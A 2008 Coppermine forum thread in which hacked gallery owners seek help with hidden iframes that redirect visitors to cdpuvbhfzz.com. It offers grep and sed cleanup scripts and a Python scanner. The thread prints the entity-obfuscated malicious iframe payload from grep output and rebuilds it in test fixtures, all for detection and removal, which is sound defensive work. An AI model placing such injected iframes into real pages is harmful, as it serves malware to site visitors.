
Author Topic: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?  (Read 320718 times)


Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #240 on: April 24, 2008, 05:13:34 pm »

Sanitization thread? I didn't find it...

http://forum.coppermine-gallery.net/index.php/topic,51671.msg253223.html#msg253223 <-- Should i use it? Will it fix my problem?
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #241 on: April 24, 2008, 06:23:42 pm »

As suggested I have tried to come up with an article that explains how to thoroughly sanitize your hacked Coppermine-driven site. I have started a thread named "Yikes, I've been hacked! Now what?" and locked it on posting to keep it from getting cluttered like this one. HTH

Joachim
Logged

Understudy

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Gender: Male
  • Posts: 51
    • Another boring website
Iframe Exploits tutorial
« Reply #242 on: April 25, 2008, 01:32:56 am »

Please note that the latest version of Coppermine covers this issue. If you haven't updated, it's your own fault.
Note this describes me working on a FreeBSD server. I suppose it will also work on a Linux server. Windows I have no idea.

With the recent exploit on MySQL and my own concerns for security, I figured I would help out those who are not 24/7 sysadmins.

The exploit caused some out there to be hijacked by snot nosed script kiddies who put nasty things in coppermine pages and made life miserable for windoze users who are affected by every virus out there.

The script would be placed in an iframe tag with a weird numbered picture.
You can find it by going to your Coppermine directory and running this command:
grep -r 'iframe src' *
If you see something like this:
albums/userpics/10001/45563131x.jpg:echo <iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>
It could be bad.

You could also discover it by doing this:
lynx -dump http://foo.com/copperminedirectory/thumbnails.php?album=XXX (where XXX is the number of an album)

Lynx is a *nix based text browser.

You would see in the output something like this:
References

   Visible links
   1. http://flboioawone.com  <-- not a real link. The gibberish type URL is what you are looking for.

What you want to make note of is the numbered .jpg (45563131x.jpg shown under the grep command) and the weird URL shown under the lynx command.

Both of these would be signs that someone who still lives in mom's basement exploited a vulnerability.

Your job is to remove them.

How do we do that?
Coppermine has a nice shell script:
#!/bin/sh
# List every file under the current directory that contains the encoded
# iframe (the payload starts with &#104; which is the "h" of http).
# A private temp file is used instead of a fixed /tmp name.
LIST=$(mktemp /tmp/iframelist.XXXXXX) || exit 1
grep -rl '<iframe src="&#104;' . > "$LIST"

# PHP files: the tag was injected inside a "<?php echo '...'; ?>" wrapper,
# so strip the whole wrapper. A copy with .corr appended keeps the original.
grep '\.php$' "$LIST" | while read -r i; do
  cp "$i" "$i.corr"
  sed "s/<?php echo '<iframe.*<\/iframe>'; ?>//g" "$i.corr" > "$i"
done

# HTML files: the bare tag was injected, so strip just the iframe.
grep '\.html\?$' "$LIST" | while read -r i; do
  cp "$i" "$i.corr"
  sed 's/<iframe src="&#104;.*<\/iframe>//g' "$i.corr" > "$i"
done

# Anything still listed without a .corr backup was not handled above
# (for example the fake .jpg files): print it so you can inspect it by hand.
while read -r i; do
  test -f "$i.corr" && rm "$i.corr" || echo "TODO: $i"
done < "$LIST"
rm -f "$LIST"

But you will note that I needed to modify mine
I had '&#104 in my iframes not "&#104. So I had to modify the script a little.

Save the script in your coppermine directory with a nice name like dieiframe and chmod +x then run ./dieiframe and see what the results are.

Run grep -r 'iframe src' * to be sure.
You can also rm -i 45563131x.jpg where ever you find it but that can be tedious. (not your number may be different).

You should also change your login password for admin and users just to be safe.

Sincerely,
Brendhan

Logged
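The grep-and-sed approach in the tutorial above keys on one exact payload string. The Python below is an added example written for this edit (it is not Brendhan's script and not Coppermine project code) that generalises it: it matches both the '&#104; and "&#104; variants and the PHP echo wrapper, decodes the numeric-entity src so the destination host is readable, strips only hidden (1x1) or obfuscated frames so a legitimate visible iframe is left alone, keeps a .corr backup like the original script, and also lists files in an album directory that are not images by name or that start with a PHP tag (the way 45563131x.jpg did). The sample files, the web-root layout and the payload.zip name are constructed for the demo; the entity string is the one from the grep output above.

```python
from __future__ import annotations
import html
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path
from urllib.parse import urlparse
# One regex for both injection shapes in the thread: a bare tag in HTML, or the
# tag wrapped in "<?php echo '...'; ?>" with backslash-escaped quotes.
IFRAME_RE = re.compile(
    r"(?:<\?php\s+echo\s+['\"])?"            # optional "<?php echo '" wrapper
    r"<iframe\b[^>]*?\bsrc\s*=\s*\\?['\"]?"  # src= then ", ', \" or no quote
    r"(?P<src>[^'\"\\\s>]+)"                 # attribute value (often entities)
    r"[^>]*>\s*</iframe>"
    r"(?:['\"]\s*;\s*\?>)?",                 # closing "'; ?>" of the wrapper
    re.IGNORECASE,
)
DIM_RE = re.compile(r"\b(width|height)\s*=\s*\\?['\"]?(\d+)", re.IGNORECASE)
IMAGE_SUFFIXES = {".jpg", ".jpeg", ".gif", ".png"}   # what an album dir should hold

@dataclass
class Finding:
    path: str      # file relative to the scanned root ("" for a string scan)
    raw: str       # injected markup exactly as found
    url: str       # src with HTML entities decoded
    host: str      # hostname of the decoded src
    hidden: bool   # 1x1 / zero-size frame, i.e. not meant to be seen
    encoded: bool  # src was entity-obfuscated

def _finding(m: re.Match, path: str = "") -> Finding:
    dims = [int(v) for _, v in DIM_RE.findall(m.group(0))]
    url = html.unescape(m.group("src"))
    return Finding(path, m.group(0), url, urlparse(url).hostname or "",
                   bool(dims) and all(v <= 1 for v in dims), "&#" in m.group("src"))

def find_iframes(text: str, path: str = "") -> list[Finding]:
    return [_finding(m, path) for m in IFRAME_RE.finditer(text)]

def remove_iframes(text: str) -> tuple[str, int]:
    """Strip hidden or obfuscated iframes only; return (new_text, removed)."""
    removed = 0
    def _strip(m: re.Match) -> str:
        nonlocal removed
        f = _finding(m)
        if f.hidden or f.encoded:
            removed += 1
            return ""
        return m.group(0)                     # a visible, plain frame stays
    return IFRAME_RE.sub(_strip, text), removed

def scan_tree(root: Path, fix: bool = False) -> list[Finding]:
    """Walk root; with fix=True keep <name>.corr and rewrite the file cleaned."""
    findings = []
    for p in sorted(root.rglob("*")):
        if not p.is_file() or p.suffix == ".corr":
            continue
        raw = p.read_bytes()
        text = raw.decode("latin-1")          # never fails on binary content
        hits = find_iframes(text, str(p.relative_to(root)))
        if fix and any(f.hidden or f.encoded for f in hits):
            p.with_name(p.name + ".corr").write_bytes(raw)
            p.write_bytes(remove_iframes(text)[0].encode("latin-1"))
        findings.extend(hits)
    return findings

def unexpected_album_files(album_dir: Path) -> list[str]:
    """Files not named like images, or named like one but starting with <?php."""
    return sorted(p.name for p in album_dir.iterdir() if p.is_file() and
                  (p.suffix.lower() not in IMAGE_SUFFIXES
                   or p.read_bytes().startswith(b"<?php")))

# Constructed samples. ENTITY_URL is the entity string from the grep output above.
ENTITY_URL = ("&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;"
              "&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;"
              "&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;")
SAMPLE_PHP = ("<?php echo '<iframe src=\\\"" + ENTITY_URL + "\\\" width=1 height=1>"
              "</iframe>'; ?>\n<?php /* constructed: legitimate code that must survive */ ?>\n")
SAMPLE_HTML = ("<html><body><iframe src='" + ENTITY_URL + "' width=1 height=1></iframe>\n"
               "</body></html>\n")
SAMPLE_CLEAN = ("<p>Constructed page with a legitimate, visible frame:</p>\n"
                '<iframe src="https://example.com/map" width=400 height=300></iframe>\n')

def demo() -> dict:
    """Build a throwaway web root, clean it, and report what was found."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        album = root / "albums" / "userpics" / "10001"
        album.mkdir(parents=True)
        (album / "45563131x.jpg").write_text(SAMPLE_PHP)   # PHP hiding as a picture
        (album / "payload.zip").write_bytes(b"PK\x03\x04constructed")
        (root / "index.html").write_text(SAMPLE_HTML)
        (root / "about.html").write_text(SAMPLE_CLEAN)
        odd = unexpected_album_files(album)
        before = scan_tree(root, fix=True)
        after = scan_tree(root)
        return {"infected_files": sorted({f.path for f in before if f.hidden or f.encoded}),
                "hosts": sorted({f.host for f in before}),
                "remaining": sum(1 for f in after if f.hidden or f.encoded),
                "unexpected": odd}
```

Run scan_tree(Path("."), fix=False) from the gallery root first and read the hosts it reports; only rerun with fix=True once every hit is really an injected frame, because the .corr backups are the only copy of the originals the script leaves behind.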

Understudy

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Gender: Male
  • Posts: 51
    • Another boring website
Re: Iframe Exploits tutorial
« Reply #243 on: April 25, 2008, 05:42:34 am »

correcting a typo:
You can also rm -i 45563131x.jpg where ever you find it but that can be tedious. (not your number may be different).

Should read
You can also rm -i 45563131x.jpg where ever you find it but that can be tedious. (note your number may be different).

Sincerely,
Brendhan
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Iframe Exploits tutorial
« Reply #244 on: April 25, 2008, 07:00:11 am »

Thanks for your readiness to share.
Why this is not valid: the iframe injection is the payload of the hack - it will/may differ, as the attack pattern of the hack varies. Might work for you, may or may not work for others. Merging with the thread that deals with the hack.
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #245 on: April 25, 2008, 06:25:01 pm »

OMG :( It didn't help! I did what you told me:

Upgrade to 4.18 and then do things in "Yikes, my sites has been hacked!"

and now look: http://gallery.tatushow.com/ :( There's still this stupid iframe with viruses! :(
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #246 on: April 25, 2008, 06:45:05 pm »

And I still can't upload the pictures...
Logged

François Keller

  • Dev Team member
  • Coppermine addict
  • ****
  • Country: fr
  • Gender: Male
  • Posts: 9096
  • aka Frantz
    • Ma galerie
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #247 on: April 25, 2008, 06:52:12 pm »

Upgrade to 4.18 and then do things in "Yikes, my sites has been hacked!"
Surely not. Sanitize your install by looking in the album folder for unexpected files (.zip files etc.) and for infected files (look in all files for the virus code, which starts with <iframe>).
There are plenty of threads dealing with this problem.
Logged
Did you read the DOC ? the FAQ ? and search the board before posting ?
My Blog

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #248 on: April 25, 2008, 07:00:59 pm »

Upgrade to 4.18 and then do things in "Yikes, my sites has been hacked!"
No, that's not what I said. The thread "Yikes, my sites has been hacked" contains all instructions you need. If you do exactly as suggested there, the upgrade will be performed and your site will be sanitized. Guaranteed. You failed to do as suggested there. Nobody said that you need to upgrade and then perform "Yikes". See how you read advice? Read it carefully.
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #249 on: April 25, 2008, 07:09:55 pm »

I really read it carefully, I did everything many times to be sure! I read it 32232323232 times to be sure! I did everything word by word... After upgrading there weren't any mistakes, so I "include" subfolders, and I checked all folders, I deleted 45563131x.jpg + iframes and it's still there! :(
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #250 on: April 25, 2008, 07:25:21 pm »

OMG :( So what do I have to do now? If I upgraded that...? :(
Logged

tfischer

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 75
    • Fischersplace Photo Gallery
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #251 on: April 25, 2008, 07:27:18 pm »

I read it 32232323232 times to be sure! <snip> I deleted 45563131x.jpg + iframes and it's still there! :(

Now you're just being sarcastic, which doesn't lend people's sympathy to your cause...

-Tim
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #252 on: April 25, 2008, 07:30:04 pm »

I posted it without reading the last post, sorry... now I realise... So I upgraded my gallery without first doing "Yikes, my site has been hacked"... What do I have to do now to save my gallery? :(
Logged

tfischer

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 75
    • Fischersplace Photo Gallery
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #253 on: April 25, 2008, 07:55:11 pm »

I posted it without reading the last post, sorry... now I realise... So I upgraded my gallery without first doing "Yikes, my site has been hacked"... What do I have to do now to save my gallery? :(

Same thing that you've been told over and over and over (perhaps 32232323232 times):  READ and FOLLOW the information in "Yikes, my site has been hacked".  There are no shortcuts, there are no magic cures. 

-Tim
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #254 on: April 25, 2008, 07:59:35 pm »

But will it make sense? Because, you know, I upgraded my gallery to 1.4.18 FIRST, and then I did "Yikes, my site has been hacked"... So there's nothing bad? If I do the things which were written in "Yikes, my site has been hacked", then it will work?
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #255 on: April 25, 2008, 08:36:00 pm »

Yes, as you have been told now several times.  ::)
Now stop whining and just do as suggested >:(. If you're not able to perform this simple set of instructions, hire someone to do the job for you, as suggested in "Yikes" as well.
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #256 on: April 25, 2008, 08:42:51 pm »

OOOKKK :D Sorry for interrupting... :( So now I'll do this, even if my gallery was upgraded...
Logged

kromnaios

  • Coppermine newbie
  • Gender: Male
  • Posts: 16
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #257 on: April 27, 2008, 01:05:08 pm »

Hello. I use Coppermine gallery on 2 sites and it has been hacked for the second time in three weeks. The first time I upgraded to 1.4.17. Now it is hacked again on both sites. On one of these, everything is hacked (all the pages, forum, guestbook, gallery) with the iframe tag. I will restore the whole site and upgrade the gallery to 1.4.18. But then, will the gallery be safe or could we have the problem again? Is it certain that 1.4.18 is not vulnerable?
Logged

Understudy

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Gender: Male
  • Posts: 51
    • Another boring website
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #258 on: April 27, 2008, 01:33:23 pm »

Hello. I use Coppermine gallery on 2 sites and it has been hacked for the second time in three weeks. The first time I upgraded to 1.4.17. Now it is hacked again on both sites. On one of these, everything is hacked (all the pages, forum, guestbook, gallery) with the iframe tag. I will restore the whole site and upgrade the gallery to 1.4.18. But then, will the gallery be safe or could we have the problem again? Is it certain that 1.4.18 is not vulnerable?
Read http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

And yes 1.4.18 covers the issue. You should also change your passwords.

Sincerely,
Brendhan

Logged

luzma

  • Coppermine newbie
  • Posts: 2
Virus on the page of Coppermine
« Reply #259 on: April 27, 2008, 06:05:46 pm »

Hi,

I have installed Coppermine 1.4.10 and it was working fine, but now I don't know what happened, because when I open the page http://www.astrocaat.it/cpg1410/index.php it wants to connect to another site, and friends told me that their antivirus detects a virus on this page.

I don't know how to resolve the problem. I put the index.php that I had on my computer back on the website, but it is the same, and I don't have a current backup of the gallery to put on the website.

Have you seen this problem before ? Can you give me any suggestion ?

Thanks in advance,

Luz Marina
Logged